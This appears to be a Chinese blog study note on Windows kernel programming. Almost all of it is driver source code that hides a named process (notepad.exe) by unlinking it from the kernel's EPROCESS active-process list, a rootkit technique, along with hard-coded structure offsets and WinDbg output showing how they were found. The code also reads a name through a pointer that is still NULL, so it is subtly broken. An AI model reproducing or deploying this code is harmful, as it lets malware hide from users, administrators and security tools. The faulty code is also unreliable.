最近在学习内核编程,记录一下最近的学习笔记。
原理:将当前进程从eprocess结构的链表中删除
无法被! process 0 0 看见
#include "HideProcess.h" #ifdef WIN64 #define ACTIVEPROCESSLINKS_EPROCESS 0x188 #define IMAGEFILENAME_EPROCESS 0x2e0 //16个字节组成的单字数组 #else #define ACTIVEPROCESSLINKS_EPROCESS 0x088 #define IMAGEFILENAME_EPROCESS 0x174 //16个字节组成的单字数组 #endif NTSTATUS DriverEntry(PDRIVER_OBJECT DriverObject,PUNICODE_STRING RegisterPath) { PDEVICE_OBJECT DeviceObject; NTSTATUS Status; int i = 0; UNICODE_STRING DeviceName; UNICODE_STRING LinkName; RtlInitUnicodeString(&DeviceName,DEVICE_NAME); RtlInitUnicodeString(&LinkName,LINK_NAME); //创建设备对象; Status = IoCreateDevice(DriverObject,0, &DeviceName,FILE_DEVICE_UNKNOWN,0,FALSE,&DeviceObject); if (!NT_SUCCESS(Status)) { return Status; } Status = IoCreateSymbolicLink(&LinkName,&DeviceName); for (i = 0; i<IRP_MJ_MAXIMUM_FUNCTION; i++) { DriverObject->MajorFunction[i] = DefaultPassThrough; } DriverObject->DriverUnload = UnloadDriver; if (HideProcess("notepad.exe") == FALSE) { DbgPrint("No Exist "); } #ifdef WIN64 DbgPrint("WIN64: HideProcess IS RUNNING!!!"); #else DbgPrint("WIN32: HideProcess SIS RUNNING!!!"); #endif return STATUS_SUCCESS; } NTSTATUS DefaultPassThrough(PDEVICE_OBJECT DeviceObject,PIRP Irp) { Irp->IoStatus.Status = STATUS_SUCCESS; Irp->IoStatus.Information = 0; IoCompleteRequest(Irp,IO_NO_INCREMENT); return STATUS_SUCCESS; } VOID UnloadDriver(PDRIVER_OBJECT DriverObject) { UNICODE_STRING LinkName; PDEVICE_OBJECT NextDeviceObject = NULL; PDEVICE_OBJECT CurrentDeviceObject = NULL; RtlInitUnicodeString(&LinkName,LINK_NAME); IoDeleteSymbolicLink(&LinkName); CurrentDeviceObject = DriverObject->DeviceObject; while (CurrentDeviceObject != NULL) { NextDeviceObject = CurrentDeviceObject->NextDevice; IoDeleteDevice(CurrentDeviceObject); CurrentDeviceObject = NextDeviceObject; } DbgPrint("HideProcess IS STOPPED!!!"); } BOOLEAN HideProcess(char* ProcessImageName) { //通过进程EProcess (ObjectHeader ObjectBody) /* kd> !process 0 0 PROCESS fffffa8031ec9060 SessionId: 1 Cid: 073c Peb: 7fffffdf000 ParentCid: 06f8 DirBase: 7fb21000 ObjectTable: fffff8a001ea3600 HandleCount: 545. Image: explorer.exe kd> dt _eprocess fffffa8031ec9060 +0x000 Pcb : _KPROCESS +0x160 ProcessLock : _EX_PUSH_LOCK +0x168 CreateTime : _LARGE_INTEGER 0x01d29b23`d17ef664 +0x170 ExitTime : _LARGE_INTEGER 0x0 +0x178 RundownProtect : _EX_RUNDOWN_REF +0x180 UniqueProcessId : 0x00000000`0000073c Void +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31aeb1e8 - 0xfffffa80`3265da98 ] +0x198 ProcessQuotaUsage : [2] 0x3dc8 kd> dt _LIST_ENTRY nt!_LIST_ENTRY +0x000 Flink : Ptr64 _LIST_ENTRY Next ListEntry +0x008 Blink : Ptr64 _LIST_ENTRY Previous kd> dt _eprocess 0xfffffa80`31aeb1e8-0x188 nt!_EPROCESS +0x000 Pcb : _KPROCESS +0x188 ActiveProcessLinks : _LIST_ENTRY [ 0xfffffa80`31ec84d8 - 0xfffffa80`31ec91e8 ] +0x2e0 ImageFileName : [15] "vmtoolsd.exe" [空头][System][][][][Explorer][vmtoolsd] */ PLIST_ENTRY ListEntry = NULL; PEPROCESS EProcess = NULL; PEPROCESS v1 = NULL; PEPROCESS EmptyEProcess = NULL; char* ImageFileName = NULL; EProcess = PsGetCurrentProcess(); if (EProcess == NULL) { return FALSE; } ImageFileName = (char*)((UINT8*)v1 + IMAGEFILENAME_EPROCESS); DbgPrint("CurrentImageFileName:%s ", ImageFileName); v1 = EProcess; //System.exe EProcess //System.exe 的前一个 实际上是一个空头节点 ListEntry = (PLIST_ENTRY)((UINT8*)EProcess + ACTIVEPROCESSLINKS_EPROCESS); //0x188 EmptyEProcess = (PEPROCESS)(((ULONG_PTR)(ListEntry->Blink)) - ACTIVEPROCESSLINKS_EPROCESS); ListEntry = NULL; while (v1 != EmptyEProcess) //System!=空头节点 { ImageFileName = (char*)((UINT8*)v1 + IMAGEFILENAME_EPROCESS); //System.exe Calc.exe //DbgPrint("ImageFileName:%s ",szImageFileName); ListEntry = (PLIST_ENTRY)((ULONG_PTR)v1 + ACTIVEPROCESSLINKS_EPROCESS); if (strstr(ImageFileName, ProcessImageName) != NULL) { if (ListEntry != NULL) { RemoveEntryList(ListEntry); break; } } v1 = (PEPROCESS)(((ULONG_PTR)(ListEntry->Flink)) - ACTIVEPROCESSLINKS_EPROCESS); //Calc } return TRUE; }